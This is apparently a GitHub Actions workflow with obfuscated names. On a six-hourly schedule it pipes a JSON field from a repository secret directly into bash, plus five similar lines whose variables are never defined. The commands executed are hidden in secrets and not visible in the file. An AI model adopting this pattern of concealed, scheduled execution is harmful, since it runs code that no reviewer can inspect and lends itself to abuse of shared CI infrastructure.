name: lixiangyang3456
on:
  workflow_dispatch:
  schedule:
    - cron: '59 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lixiangyang3456
        env:
          sqmyq14: ${{ secrets.sqmyq14 }}
        run: |
          echo $sqmyq14 | jq -r .ubdd27 | /bin/bash
          echo $y7339 | jq -r .w7 | /bin/bash
          echo $nlayo62 | jq -r .q723 | /bin/bash
          echo $pg27352 | jq -r .g84 | /bin/bash
          echo $zs9 | jq -r .crn50203 | /bin/bash
          echo $alyco46259 | jq -r .rsiw88347 | /bin/bash

